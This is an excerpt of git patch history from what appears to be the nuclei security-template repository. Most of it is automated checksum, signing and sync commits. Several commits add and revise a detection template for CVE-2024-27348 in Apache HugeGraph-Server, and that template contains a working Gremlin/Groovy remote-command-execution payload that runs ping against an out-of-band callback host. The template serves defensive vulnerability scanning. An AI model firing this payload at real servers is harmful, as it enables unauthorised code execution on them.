http/exposures/configs/detect-drone-config.yaml:8dcfc65408172b76a554d1f5970d2c3cb1edb514 -http/exposures/configs/django-variables-exposed.yaml:30ad3076e779010142f49d0a27c4bffee7e40743 +http/exposures/configs/django-variables-exposed.yaml:fb2f53f6ba6444f1bd26735f2f2553d1e1ac1a25 http/exposures/configs/docker-compose-config.yaml:c09c54ae8ef8b7eb9d1afea7fe19ef6b2b0169d3 http/exposures/configs/dockercfg-config.yaml:9379a60ea042ee284d0e6075c43660b6267cb383 http/exposures/configs/dockerfile-hidden-disclosure.yaml:5b74c22b6a4d55f0b5cb8fd47e9a181453340d63 @@ -8618,7 +8618,7 @@ ssl/tls-version.yaml:4e40f08efbb39172b9280ea9e26ca5f0a14a575a ssl/untrusted-root-certificate.yaml:a91d36990a1d052f5ee64d170ad8f084d38dab19 ssl/weak-cipher-suites.yaml:62fe808d9dfafda67c410e6cb9445fdc70257e89 ssl/wildcard-tls.yaml:d244f62c7bd22d3868fc6fc7cb9550af6b261210 -templates-checksum.txt:769f3304117aa68254cb99c12bff89cd40d88b3e +templates-checksum.txt:ed7b014040f2673727a1003c0d07a4659b2bc98e wappalyzer-mapping.yml:7f03bd65baacac20c1dc6bbf35ff2407959574f1 workflows/74cms-workflow.yaml:bb010e767ad32b906153e36ea618be545b4e22d0 workflows/acrolinx-workflow.yaml:8434089bb55dec3d7b2ebc6a6f340e73382dd0c4 From d7ff1b8656619fe4a5bc4302a31ab019c67d1df1 Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Sun, 2 Jun 2024 22:02:11 +0530 Subject: [PATCH 1678/1768] minor update --- http/misconfiguration/dont-panic-traceback.yaml | 3 ++- 1 file changed, 2 insertions(+), 1 deletion(-) diff --git a/http/misconfiguration/dont-panic-traceback.yaml b/http/misconfiguration/dont-panic-traceback.yaml index ef9b175207..557553f5d9 100644 --- a/http/misconfiguration/dont-panic-traceback.yaml +++ b/http/misconfiguration/dont-panic-traceback.yaml @@ -4,7 +4,8 @@ info: name: DON'T PANIC Traceback author: ritikchaddha severity: low - description: DON'T PANIC Traceback was detected. + description: | + DON'T PANIC Traceback was detected. metadata: max-request: 1 verified: true From 6d61dab5926111fd7c1fef4883368505da9e6875 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Sun, 2 Jun 2024 16:32:21 +0000 Subject: [PATCH 1679/1768] Auto Template Signing [Sun Jun 2 16:32:21 UTC 2024] :robot: --- headless/webpack-sourcemap.yaml | 1 + 1 file changed, 1 insertion(+) diff --git a/headless/webpack-sourcemap.yaml b/headless/webpack-sourcemap.yaml index 622ed9e967..0da0eff55f 100644 --- a/headless/webpack-sourcemap.yaml +++ b/headless/webpack-sourcemap.yaml @@ -218,3 +218,4 @@ http: - type: status status: - 200 +# digest: 490a00463044022037d26b0bf4e1e46e77bcae5925a09f8dd5e8ea38894b06c3a450cac92ae803b5022016539aa792c7f25f571a45c194e983fa46aa24f8980c2829025ebf9e7c4e3b1c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file From 53c40ae1b37cec93e0d9905dff5778f5a7c60e07 Mon Sep 17 00:00:00 2001 From: "[PDBot]" Date: Sun, 2 Jun 2024 16:35:12 +0000 Subject: [PATCH 1680/1768] Auto Generated New Template Addition List [Sun Jun 2 16:35:12 UTC 2024] :robot: --- .new-additions | 1 + 1 file changed, 1 insertion(+) diff --git a/.new-additions b/.new-additions index 2d7ab1ea48..039efae600 100644 --- a/.new-additions +++ b/.new-additions @@ -23,6 +23,7 @@ http/exposed-panels/vrealize-hyperic-login-panel.yaml http/exposures/tokens/wechat/wechat-secret-key.yaml http/iot/netgear-boarddataww-rce.yaml http/miscellaneous/directory-listing.yaml +http/misconfiguration/dont-panic-traceback.yaml http/misconfiguration/installer/activecollab-installer.yaml http/misconfiguration/installer/call-com-installer.yaml http/misconfiguration/installer/cms-made-simple-installer.yaml From 77352ad05c3a13846b7acbf98e9d770bcc4e77eb Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Sun, 2 Jun 2024 16:35:16 +0000 Subject: [PATCH 1681/1768] Auto Generated Templates Checksum [Sun Jun 2 16:35:16 UTC 2024] :robot: --- templates-checksum.txt | 5 +++-- 1 file changed, 3 insertions(+), 2 deletions(-) diff --git a/templates-checksum.txt b/templates-checksum.txt index c042eeb76a..91e91e0dec 100644 --- a/templates-checksum.txt +++ b/templates-checksum.txt @@ -579,7 +579,7 @@ headless/prototype-pollution-check.yaml:e7e9713474a3f7376073cb23ae5f878973238f65 headless/screenshot.yaml:037205c1a1cb5617d119da0a545d1d6742629ef4 headless/technologies/js-libraries-detect.yaml:5c62ba8ad03afb53da2856ea757fe4fd20694567 headless/technologies/sap-spartacus.yaml:fd0c71b102c08d82bbc848c59b83b92634d13cc6 -headless/webpack-sourcemap.yaml:f4fffc8ef5c82993739161e22481729e26074d16 +headless/webpack-sourcemap.yaml:c23ffc4991461ced4e784fff2889519393bb1fd1 headless/window-name-domxss.yaml:d56b00173f38f50a27940e5beeaa9499d6cd7c2c helpers/payloads/CVE-2018-25031.js:47b0062436e7afe62fc2f8251a29bb4d443327d2 helpers/payloads/CVE-2020-5776.csv:bb017fe08ae985c23145f7b69aab97cdffbbd8aa @@ -5332,6 +5332,7 @@ http/misconfiguration/dlink-unauth-cgi-script.yaml:e2461bf769dc0ad41f83df9c7d2f7 http/misconfiguration/docker-daemon-exposed.yaml:840bdb31f81cbeaa2b38bc57b6c1a51cc6007946 http/misconfiguration/docker-registry.yaml:5c7611723d46851a846d043b8fca50d505e5870f http/misconfiguration/docmosis-tornado-server.yaml:f1b6f28d042655fb76f80a329f1d252156dd1e88 +http/misconfiguration/dont-panic-traceback.yaml:787e03c05e44bc4f63f74daceb44435cd8fc73d8 http/misconfiguration/doris-dashboard.yaml:bb6e1b170aec39489117c28663f92f97df6f09c5 http/misconfiguration/druid-monitor.yaml:730666deb48b9f1f6f12affc470425c39e0e9429 http/misconfiguration/drupal/drupal-user-enum-ajax.yaml:dcd541d6927e9930c8f13cbe69c72c1f48a3b44c @@ -8618,7 +8619,7 @@ ssl/tls-version.yaml:4e40f08efbb39172b9280ea9e26ca5f0a14a575a ssl/untrusted-root-certificate.yaml:a91d36990a1d052f5ee64d170ad8f084d38dab19 ssl/weak-cipher-suites.yaml:62fe808d9dfafda67c410e6cb9445fdc70257e89 ssl/wildcard-tls.yaml:d244f62c7bd22d3868fc6fc7cb9550af6b261210 -templates-checksum.txt:ed7b014040f2673727a1003c0d07a4659b2bc98e +templates-checksum.txt:8062ab3a82fb31c59eafa6dbffb1a1206bb77cc2 wappalyzer-mapping.yml:7f03bd65baacac20c1dc6bbf35ff2407959574f1 workflows/74cms-workflow.yaml:bb010e767ad32b906153e36ea618be545b4e22d0 workflows/acrolinx-workflow.yaml:8434089bb55dec3d7b2ebc6a6f340e73382dd0c4 From faeeb51cd57895b0e9976e0fec785cc50d47f2e3 Mon Sep 17 00:00:00 2001 From: "[PDBot]" Date: Sun, 2 Jun 2024 16:35:59 +0000 Subject: [PATCH 1682/1768] Syncing Templates --- .github/workflows/templates-sync.yml | 1 + 1 file changed, 1 insertion(+) diff --git a/.github/workflows/templates-sync.yml b/.github/workflows/templates-sync.yml index e80e54ad36..4fcb0240cf 100644 --- a/.github/workflows/templates-sync.yml +++ b/.github/workflows/templates-sync.yml @@ -28,6 +28,7 @@ on: - 'http/exposures/tokens/wechat/wechat-secret-key.yaml' - 'http/iot/netgear-boarddataww-rce.yaml' - 'http/miscellaneous/directory-listing.yaml' + - 'http/misconfiguration/dont-panic-traceback.yaml' - 'http/misconfiguration/installer/activecollab-installer.yaml' - 'http/misconfiguration/installer/call-com-installer.yaml' - 'http/misconfiguration/installer/cms-made-simple-installer.yaml' From d5f6cc197c2c5b1f01a1df110eb752894b0099eb Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Sun, 2 Jun 2024 16:37:05 +0000 Subject: [PATCH 1683/1768] Auto Template Signing [Sun Jun 2 16:37:05 UTC 2024] :robot: --- http/exposures/configs/django-variables-exposed.yaml | 3 +-- http/misconfiguration/dont-panic-traceback.yaml | 1 + 2 files changed, 2 insertions(+), 2 deletions(-) diff --git a/http/exposures/configs/django-variables-exposed.yaml b/http/exposures/configs/django-variables-exposed.yaml index f1a4fd7bf5..72ad7b5639 100644 --- a/http/exposures/configs/django-variables-exposed.yaml +++ b/http/exposures/configs/django-variables-exposed.yaml @@ -51,5 +51,4 @@ http: status: - 400 - 500 - -# digest: 4a0a0047304502206f3cceff2a49b7e830b5640ef43b674856508c9ef6a1e5a48080f2b377b018c7022100de2304b178a37586efd5bd0556183efdb7088d00c970c09766406c6394fe795e:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a00473045022100f67dd14e356fef79d9b80e6c9036835e73695659b834b166d39b5832d8d8677b02201fd1315aae896bd498f008b7a534809cbd5510094e9199d6e04fd4a3d46f9add:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/misconfiguration/dont-panic-traceback.yaml b/http/misconfiguration/dont-panic-traceback.yaml index 557553f5d9..e973ef835a 100644 --- a/http/misconfiguration/dont-panic-traceback.yaml +++ b/http/misconfiguration/dont-panic-traceback.yaml @@ -26,3 +26,4 @@ requests: - "DON'T PANIC" condition: and case-insensitive: true +# digest: 4a0a004730450220753b248a82537d74321f3d166e708bde25d810b46869022b5308b6a49d905a9e022100cfbd256f8d9a2de30a8db36826f509c392bfd7778bd393f92c025a2ef0e70ce7:922c64590222798bb761d5b6d8e72950 \ No newline at end of file From e1539006004c0439deb23bfb65dc31599d48d493 Mon Sep 17 00:00:00 2001 From: "[PDBot]" Date: Sun, 2 Jun 2024 16:38:16 +0000 Subject: [PATCH 1684/1768] Auto Generated New Template Addition List [Sun Jun 2 16:38:15 UTC 2024] :robot: --- .new-additions | 1 + 1 file changed, 1 insertion(+) diff --git a/.new-additions b/.new-additions index 039efae600..f71bbbc72d 100644 --- a/.new-additions +++ b/.new-additions @@ -19,6 +19,7 @@ http/exposed-panels/cisco-firepower-panel.yaml http/exposed-panels/digital-watchdog-panel.yaml http/exposed-panels/fortinet/fortisiem-panel.yaml http/exposed-panels/oracle-access-management.yaml +http/exposed-panels/oracle-peoplesoft-panel.yaml http/exposed-panels/vrealize-hyperic-login-panel.yaml http/exposures/tokens/wechat/wechat-secret-key.yaml http/iot/netgear-boarddataww-rce.yaml From 629896a57310867293aae5707df103a6b26eaefe Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Sun, 2 Jun 2024 16:38:19 +0000 Subject: [PATCH 1685/1768] Auto Generated Templates Checksum [Sun Jun 2 16:38:19 UTC 2024] :robot: --- templates-checksum.txt | 8 ++++---- 1 file changed, 4 insertions(+), 4 deletions(-) diff --git a/templates-checksum.txt b/templates-checksum.txt index 91e91e0dec..46d7312833 100644 --- a/templates-checksum.txt +++ b/templates-checksum.txt @@ -4205,7 +4205,7 @@ http/exposed-panels/oracle-enterprise-manager-login.yaml:76e328b658d117d5c45bd8f http/exposed-panels/oracle-integrated-manager.yaml:33fabda935c2ddc490939f8e5d5abc27fd5f1f49 http/exposed-panels/oracle-opera-login.yaml:1a1e64aebaeb4635b85cfcdfe7f88b1856e35c3f http/exposed-panels/oracle-people-enterprise.yaml:1d99296ada4cbb377939cfb07a4171a2569d36ea -http/exposed-panels/oracle-people-sign-in.yaml:b465ed03a35244adb8f9c88b9fe7ebd5cc7b7447 +http/exposed-panels/oracle-peoplesoft-panel.yaml:d8a82c1cd1554621b203704ed6dfcc00d116260e http/exposed-panels/orchid-vms-panel.yaml:ea0e836bcb094ab56245bb733490e2c210fdba72 http/exposed-panels/osnexus-panel.yaml:1397581ae2c1d7c2943eac8291ce75e8444bcf09 http/exposed-panels/osticket/osticket-install.yaml:622ae6b555a887e823b9252eb9509ffb1b7d155f @@ -4667,7 +4667,7 @@ http/exposures/configs/dbeaver-credentials.yaml:cbd4ab7a04824a87c57dd64ef1c700e5 http/exposures/configs/debug-vars.yaml:0b108f2c2468d3700a7a837b79eec21e3d060785 http/exposures/configs/deployment-ini.yaml:333132cbc8a1874f239fed48f924a70752a4a46e http/exposures/configs/detect-drone-config.yaml:8dcfc65408172b76a554d1f5970d2c3cb1edb514 -http/exposures/configs/django-variables-exposed.yaml:fb2f53f6ba6444f1bd26735f2f2553d1e1ac1a25 +http/exposures/configs/django-variables-exposed.yaml:f459d04766a2b8b6cb97e522e0623abc7c3a8b17 http/exposures/configs/docker-compose-config.yaml:c09c54ae8ef8b7eb9d1afea7fe19ef6b2b0169d3 http/exposures/configs/dockercfg-config.yaml:9379a60ea042ee284d0e6075c43660b6267cb383 http/exposures/configs/dockerfile-hidden-disclosure.yaml:5b74c22b6a4d55f0b5cb8fd47e9a181453340d63 @@ -5332,7 +5332,7 @@ http/misconfiguration/dlink-unauth-cgi-script.yaml:e2461bf769dc0ad41f83df9c7d2f7 http/misconfiguration/docker-daemon-exposed.yaml:840bdb31f81cbeaa2b38bc57b6c1a51cc6007946 http/misconfiguration/docker-registry.yaml:5c7611723d46851a846d043b8fca50d505e5870f http/misconfiguration/docmosis-tornado-server.yaml:f1b6f28d042655fb76f80a329f1d252156dd1e88 -http/misconfiguration/dont-panic-traceback.yaml:787e03c05e44bc4f63f74daceb44435cd8fc73d8 +http/misconfiguration/dont-panic-traceback.yaml:192722987304c72b7a093ab6eb1ec3ffe4985c1a http/misconfiguration/doris-dashboard.yaml:bb6e1b170aec39489117c28663f92f97df6f09c5 http/misconfiguration/druid-monitor.yaml:730666deb48b9f1f6f12affc470425c39e0e9429 http/misconfiguration/drupal/drupal-user-enum-ajax.yaml:dcd541d6927e9930c8f13cbe69c72c1f48a3b44c @@ -8619,7 +8619,7 @@ ssl/tls-version.yaml:4e40f08efbb39172b9280ea9e26ca5f0a14a575a ssl/untrusted-root-certificate.yaml:a91d36990a1d052f5ee64d170ad8f084d38dab19 ssl/weak-cipher-suites.yaml:62fe808d9dfafda67c410e6cb9445fdc70257e89 ssl/wildcard-tls.yaml:d244f62c7bd22d3868fc6fc7cb9550af6b261210 -templates-checksum.txt:8062ab3a82fb31c59eafa6dbffb1a1206bb77cc2 +templates-checksum.txt:f368afe955ccecc89d90d8281f5db900e46f08c4 wappalyzer-mapping.yml:7f03bd65baacac20c1dc6bbf35ff2407959574f1 workflows/74cms-workflow.yaml:bb010e767ad32b906153e36ea618be545b4e22d0 workflows/acrolinx-workflow.yaml:8434089bb55dec3d7b2ebc6a6f340e73382dd0c4 From c6409ef11ecae5c296884660b0280276c8156285 Mon Sep 17 00:00:00 2001 From: "[PDBot]" Date: Sun, 2 Jun 2024 16:39:03 +0000 Subject: [PATCH 1686/1768] Syncing Templates --- .github/workflows/templates-sync.yml | 1 + 1 file changed, 1 insertion(+) diff --git a/.github/workflows/templates-sync.yml b/.github/workflows/templates-sync.yml index 4fcb0240cf..bd3eff7e7e 100644 --- a/.github/workflows/templates-sync.yml +++ b/.github/workflows/templates-sync.yml @@ -24,6 +24,7 @@ on: - 'http/exposed-panels/digital-watchdog-panel.yaml' - 'http/exposed-panels/fortinet/fortisiem-panel.yaml' - 'http/exposed-panels/oracle-access-management.yaml' + - 'http/exposed-panels/oracle-peoplesoft-panel.yaml' - 'http/exposed-panels/vrealize-hyperic-login-panel.yaml' - 'http/exposures/tokens/wechat/wechat-secret-key.yaml' - 'http/iot/netgear-boarddataww-rce.yaml' From cebc145ae81f56dc6af0c74c70f265285a539429 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Sun, 2 Jun 2024 16:40:07 +0000 Subject: [PATCH 1687/1768] Auto Template Signing [Sun Jun 2 16:40:07 UTC 2024] :robot: --- http/exposed-panels/oracle-peoplesoft-panel.yaml | 1 + 1 file changed, 1 insertion(+) diff --git a/http/exposed-panels/oracle-peoplesoft-panel.yaml b/http/exposed-panels/oracle-peoplesoft-panel.yaml index 5058818389..27836986ac 100644 --- a/http/exposed-panels/oracle-peoplesoft-panel.yaml +++ b/http/exposed-panels/oracle-peoplesoft-panel.yaml @@ -49,3 +49,4 @@ http: group: 1 regex: - '(?i)\*\s+Copyright\s+\(c\)\s+([0-9,\s]+)\s+Oracle\s+and\/or\s+its\s+affiliates.' +# digest: 4a0a0047304502201eca0f3db12b2f9d439b3971dad26d9573b0fbf4b33c1a6071c81a079c5f1f2802210099e23750825396d1b6c5c84087359da16ff76b94a617090d147d08e12b9faddd:922c64590222798bb761d5b6d8e72950 \ No newline at end of file From 73693100d6ea3311d3cafc428ce4269997b2c4ce Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Mon, 3 Jun 2024 00:03:37 +0530 Subject: [PATCH 1688/1768] Create CVE-2024-27348.yaml --- http/cves/2024/CVE-2024-27348.yaml | 39 ++++++++++++++++++++++++++++++ 1 file changed, 39 insertions(+) create mode 100644 http/cves/2024/CVE-2024-27348.yaml diff --git a/http/cves/2024/CVE-2024-27348.yaml b/http/cves/2024/CVE-2024-27348.yaml new file mode 100644 index 0000000000..4f8b94b434 --- /dev/null +++ b/http/cves/2024/CVE-2024-27348.yaml @@ -0,0 +1,39 @@ +id: CVE-2024-27348 + +info: + name: Apache HugeGraph-Server Command Execution In Gremlin + author: DhiyaneshDK + severity: high + description: | + Apache HugeGraph-Server is an open-source graph database that provides a scalable and high-performance solution for managing and analyzing large-scale graph data. It is commonly used in Java8 and Java11 environments. However, versions prior to 1.3.0 are vulnerable to a remote command execution (RCE) vulnerability in the gremlin component. + reference: + - https://example.com/gremlin-vulnerability-details + - http://www.openwall.com/lists/oss-security/2024/04/22/3 + - https://hugegraph.apache.org/docs/config/config-authentication/#configure-user-authentication + - https://lists.apache.org/thread/nx6g6htyhpgtzsocybm242781o8w5kq9 + - https://github.com/fkie-cad/nvd-json-data-feeds + classification: + epss-score: 0.00045 + epss-percentile: 0.15047 + metadata: + verified: true + max-request: 1 + shodan-query: title:"HugeGraph Studio" + fofa-query: title="HugeGraph Studio" + tags: cve,cve2024,hugegraph,rce,unauth,apache + +http: + - raw: + - | + POST /gremlin HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/json + + {"gremlin": "Thread thread = Thread.currentThread();Class clz = Class.forName(\"java.lang.Thread\");java.lang.reflect.Field field = clz.getDeclaredField(\"name\");field.setAccessible(true);field.set(thread, \"SL7\");Class processBuilderClass = Class.forName(\"java.lang.ProcessBuilder\");java.lang.reflect.Constructor constructor = processBuilderClass.getConstructor(java.util.List.class);java.util.List command = java.util.Arrays.asList(\"ping\", \"{{interactsh-url}}\");Object processBuilderInstance = constructor.newInstance(command);java.lang.reflect.Method startMethod = processBuilderClass.getMethod(\"start\");startMethod.invoke(processBuilderInstance);", "bindings": {}, "language": "gremlin-groovy", "aliases": {}} + + matchers-condition: and + matchers: + - type: word + part: interactsh_protocol # Confirms the HTTP Interaction + words: + - "dns" From 1aa0726ef9562cc36d7d2ad8f624642907c3597f Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Mon, 3 Jun 2024 00:16:00 +0530 Subject: [PATCH 1689/1768] minor update --- http/cves/2024/CVE-2024-27348.yaml | 18 ++++++++++++++---- 1 file changed, 14 insertions(+), 4 deletions(-) diff --git a/http/cves/2024/CVE-2024-27348.yaml b/http/cves/2024/CVE-2024-27348.yaml index 4f8b94b434..9a41915ccc 100644 --- a/http/cves/2024/CVE-2024-27348.yaml +++ b/http/cves/2024/CVE-2024-27348.yaml @@ -7,11 +7,11 @@ info: description: | Apache HugeGraph-Server is an open-source graph database that provides a scalable and high-performance solution for managing and analyzing large-scale graph data. It is commonly used in Java8 and Java11 environments. However, versions prior to 1.3.0 are vulnerable to a remote command execution (RCE) vulnerability in the gremlin component. reference: - - https://example.com/gremlin-vulnerability-details - http://www.openwall.com/lists/oss-security/2024/04/22/3 - https://hugegraph.apache.org/docs/config/config-authentication/#configure-user-authentication - https://lists.apache.org/thread/nx6g6htyhpgtzsocybm242781o8w5kq9 - - https://github.com/fkie-cad/nvd-json-data-feeds + - https://github.com/Zeyad-Azima/CVE-2024-27348 + - https://www.incibe.es/incibe-cert/alerta-temprana/vulnerabilidades/cve-2024-27348 classification: epss-score: 0.00045 epss-percentile: 0.15047 @@ -34,6 +34,16 @@ http: matchers-condition: and matchers: - type: word - part: interactsh_protocol # Confirms the HTTP Interaction + part: interactsh_protocol # Confirms the DNS Interaction words: - - "dns" + - 'dns' + + - type: word + part: body + words: + - '"inputStream":' + + - type: word + part: header + words: + - 'application/json' From 7fbcbe5f2f9fe312cc3142faeb09426df14383f7 Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Mon, 3 Jun 2024 00:25:09 +0530 Subject: [PATCH 1690/1768] Update oracle-peoplesoft-workflow.yaml --- workflows/oracle-peoplesoft-workflow.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/workflows/oracle-peoplesoft-workflow.yaml b/workflows/oracle-peoplesoft-workflow.yaml index c757e1e648..609da79247 100644 --- a/workflows/oracle-peoplesoft-workflow.yaml +++ b/workflows/oracle-peoplesoft-workflow.yaml @@ -5,6 +5,6 @@ info: author: LogicalHunter description: A simple workflow that runs all oracle-peoplesoft related nuclei templates on a given target. workflows: - - template: http/exposed-panels/oracle-people-sign-in.yaml + - template: http/exposed-panels/oracle-peoplesoft-panel.yaml subtemplates: - tags: oracle From dd8ad0cfda6001535d567c241b84ab005bb1ce5d Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Sun, 2 Jun 2024 18:58:34 +0000 Subject: [PATCH 1692/1768] Auto Generated Templates Checksum [Sun Jun 2 18:58:34 UTC 2024] :robot: --- templates-checksum.txt | 6 +++--- 1 file changed, 3 insertions(+), 3 deletions(-) diff --git a/templates-checksum.txt b/templates-checksum.txt index 46d7312833..af6e1042bb 100644 --- a/templates-checksum.txt +++ b/templates-checksum.txt @@ -4205,7 +4205,7 @@ http/exposed-panels/oracle-enterprise-manager-login.yaml:76e328b658d117d5c45bd8f http/exposed-panels/oracle-integrated-manager.yaml:33fabda935c2ddc490939f8e5d5abc27fd5f1f49 http/exposed-panels/oracle-opera-login.yaml:1a1e64aebaeb4635b85cfcdfe7f88b1856e35c3f http/exposed-panels/oracle-people-enterprise.yaml:1d99296ada4cbb377939cfb07a4171a2569d36ea -http/exposed-panels/oracle-peoplesoft-panel.yaml:d8a82c1cd1554621b203704ed6dfcc00d116260e +http/exposed-panels/oracle-peoplesoft-panel.yaml:eb9fba3f40daeaa613feb341a707ac588a667514 http/exposed-panels/orchid-vms-panel.yaml:ea0e836bcb094ab56245bb733490e2c210fdba72 http/exposed-panels/osnexus-panel.yaml:1397581ae2c1d7c2943eac8291ce75e8444bcf09 http/exposed-panels/osticket/osticket-install.yaml:622ae6b555a887e823b9252eb9509ffb1b7d155f @@ -8619,7 +8619,7 @@ ssl/tls-version.yaml:4e40f08efbb39172b9280ea9e26ca5f0a14a575a ssl/untrusted-root-certificate.yaml:a91d36990a1d052f5ee64d170ad8f084d38dab19 ssl/weak-cipher-suites.yaml:62fe808d9dfafda67c410e6cb9445fdc70257e89 ssl/wildcard-tls.yaml:d244f62c7bd22d3868fc6fc7cb9550af6b261210 -templates-checksum.txt:f368afe955ccecc89d90d8281f5db900e46f08c4 +templates-checksum.txt:6b352658775d49791d9fbda942444861808c7dc8 wappalyzer-mapping.yml:7f03bd65baacac20c1dc6bbf35ff2407959574f1 workflows/74cms-workflow.yaml:bb010e767ad32b906153e36ea618be545b4e22d0 workflows/acrolinx-workflow.yaml:8434089bb55dec3d7b2ebc6a6f340e73382dd0c4 @@ -8734,7 +8734,7 @@ workflows/openam-workflow.yaml:286671eeaf241149216c55a6f1ea18bef70d95fd workflows/openemr-workflow.yaml:e1a6dc22407b6659a92dc1ce979401418b155270 workflows/opensis-workflow.yaml:04ea09f494dbe64e896dc62191acb37631a558a4 workflows/opensns-workflow.yaml:631f08f739a6827fec065a7bb3ae7b4488cfef7d -workflows/oracle-peoplesoft-workflow.yaml:0151f6d85fd570ef945ac9c46cbfa0e530412f6a +workflows/oracle-peoplesoft-workflow.yaml:f604aefbaed9ecb6b9e6cf049727b9fa7c7d006a workflows/oscommerce-workflow.yaml:60dec9d6d4db5cf37d2042c7c55d4914e79dc685 workflows/pandora-workflow.yaml:615f695d49a831d89719b3337ad6db950fdde879 workflows/pega-workflow.yaml:a0d28d07bc435a6d649c1cb555eb3714b9905190 From 3b13bb4a4d2991f5ff637397caff16634604d48f Mon Sep 17 00:00:00 2001 From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com> Date: Mon, 3 Jun 2024 12:47:33 +0530 Subject: [PATCH 1693/1768] Update CVE-2024-27348.yaml --- http/cves/2024/CVE-2024-27348.yaml | 28 +++++++++++----------------- 1 file changed, 11 insertions(+), 17 deletions(-) diff --git a/http/cves/2024/CVE-2024-27348.yaml b/http/cves/2024/CVE-2024-27348.yaml index 9a41915ccc..8ea9e840a5 100644 --- a/http/cves/2024/CVE-2024-27348.yaml +++ b/http/cves/2024/CVE-2024-27348.yaml @@ -1,7 +1,7 @@ id: CVE-2024-27348 info: - name: Apache HugeGraph-Server Command Execution In Gremlin + name: Apache HugeGraph-Server - Remote Command Execution author: DhiyaneshDK severity: high description: | @@ -12,7 +12,10 @@ info: - https://lists.apache.org/thread/nx6g6htyhpgtzsocybm242781o8w5kq9 - https://github.com/Zeyad-Azima/CVE-2024-27348 - https://www.incibe.es/incibe-cert/alerta-temprana/vulnerabilidades/cve-2024-27348 + - https://nvd.nist.gov/vuln/detail/CVE-2024-27348 classification: + cve-id: CVE-2024-27348 + cwe-id: CWE-77 epss-score: 0.00045 epss-percentile: 0.15047 metadata: @@ -20,7 +23,7 @@ info: max-request: 1 shodan-query: title:"HugeGraph Studio" fofa-query: title="HugeGraph Studio" - tags: cve,cve2024,hugegraph,rce,unauth,apache + tags: cve,cve2024,hugegraph,rce,apache http: - raw: @@ -31,19 +34,10 @@ http: {"gremlin": "Thread thread = Thread.currentThread();Class clz = Class.forName(\"java.lang.Thread\");java.lang.reflect.Field field = clz.getDeclaredField(\"name\");field.setAccessible(true);field.set(thread, \"SL7\");Class processBuilderClass = Class.forName(\"java.lang.ProcessBuilder\");java.lang.reflect.Constructor constructor = processBuilderClass.getConstructor(java.util.List.class);java.util.List command = java.util.Arrays.asList(\"ping\", \"{{interactsh-url}}\");Object processBuilderInstance = constructor.newInstance(command);java.lang.reflect.Method startMethod = processBuilderClass.getMethod(\"start\");startMethod.invoke(processBuilderInstance);", "bindings": {}, "language": "gremlin-groovy", "aliases": {}} - matchers-condition: and matchers: - - type: word - part: interactsh_protocol # Confirms the DNS Interaction - words: - - 'dns' - - - type: word - part: body - words: - - '"inputStream":' - - - type: word - part: header - words: - - 'application/json' + - type: dsl + dsl: + - 'contains(interactsh_protocol, "dns")' + - 'contains(header, "application/json")' + - 'contains(body, "inputStream\":")' + condition: and From 62aafdb7a41b91fccf9530c68c0e29e25e7a577f Mon Sep 17 00:00:00 2001 From: "[PDBot]" Date: Mon, 3 Jun 2024 08:55:25 +0000 Subject: [PATCH 1694/1768] Auto Generated New Template Addition List [Mon Jun 3 08:55:24 UTC 2024] :robot: --- .new-additions | 1 + 1 file changed, 1 insertion(+) diff --git a/.new-additions b/.new-additions index f71bbbc72d..05d9cd9168 100644 --- a/.new-additions +++ b/.new-additions @@ -1,5 +1,6 @@ headless/webpack-sourcemap.yaml http/cnvd/2024/CNVD-2024-15077.yaml +http/cves/2022/CVE-2022-0666.yaml http/cves/2022/CVE-2022-1580.yaml http/cves/2022/CVE-2022-34534.yaml http/cves/2023/CVE-2023-2059.yaml From 1b3320dae6a2b6547a43179209d0696b6bcf166c Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Mon, 3 Jun 2024 08:55:29 +0000 Subject: [PATCH 1695/1768] Auto Generated Templates Checksum [Mon Jun 3 08:55:29 UTC 2024] :robot: --- templates-checksum.txt | 3 ++- 1 file changed, 2 insertions(+), 1 deletion(-) diff --git a/templates-checksum.txt b/templates-checksum.txt index af6e1042bb..d19da2087a 100644 --- a/templates-checksum.txt +++ b/templates-checksum.txt @@ -2447,6 +2447,7 @@ http/cves/2022/CVE-2022-0653.yaml:52274e93b6ea8926e170293dce796d792a5e0a48 http/cves/2022/CVE-2022-0656.yaml:2975cb24c367f2e0bf11b3a966529591c8ed2edf http/cves/2022/CVE-2022-0658.yaml:2b1f5971384f81ffce9e3a8427555bbd01b3b3a5 http/cves/2022/CVE-2022-0660.yaml:847e3682f3a3903749f0d44adf0697a838a405e4 +http/cves/2022/CVE-2022-0666.yaml:9333df97b369c29cff7be3249e4eaaa7257fd446 http/cves/2022/CVE-2022-0678.yaml:8b33e92b350e562c7bece96f5e9328e7319792ae http/cves/2022/CVE-2022-0679.yaml:bb862b57bb18b1832313bed2c8f3095286ab5f0b http/cves/2022/CVE-2022-0692.yaml:16bb78665f4c62b041bf0641d2afe49587c40472 @@ -8619,7 +8620,7 @@ ssl/tls-version.yaml:4e40f08efbb39172b9280ea9e26ca5f0a14a575a ssl/untrusted-root-certificate.yaml:a91d36990a1d052f5ee64d170ad8f084d38dab19 ssl/weak-cipher-suites.yaml:62fe808d9dfafda67c410e6cb9445fdc70257e89 ssl/wildcard-tls.yaml:d244f62c7bd22d3868fc6fc7cb9550af6b261210 -templates-checksum.txt:6b352658775d49791d9fbda942444861808c7dc8 +templates-checksum.txt:816536bc24b240f6eebd29134f71e4e01fb99ca8 wappalyzer-mapping.yml:7f03bd65baacac20c1dc6bbf35ff2407959574f1 workflows/74cms-workflow.yaml:bb010e767ad32b906153e36ea618be545b4e22d0 workflows/acrolinx-workflow.yaml:8434089bb55dec3d7b2ebc6a6f340e73382dd0c4 From e4c9e783c0557a7adde7c37bec1551a78f1f2a4f Mon Sep 17 00:00:00 2001 From: 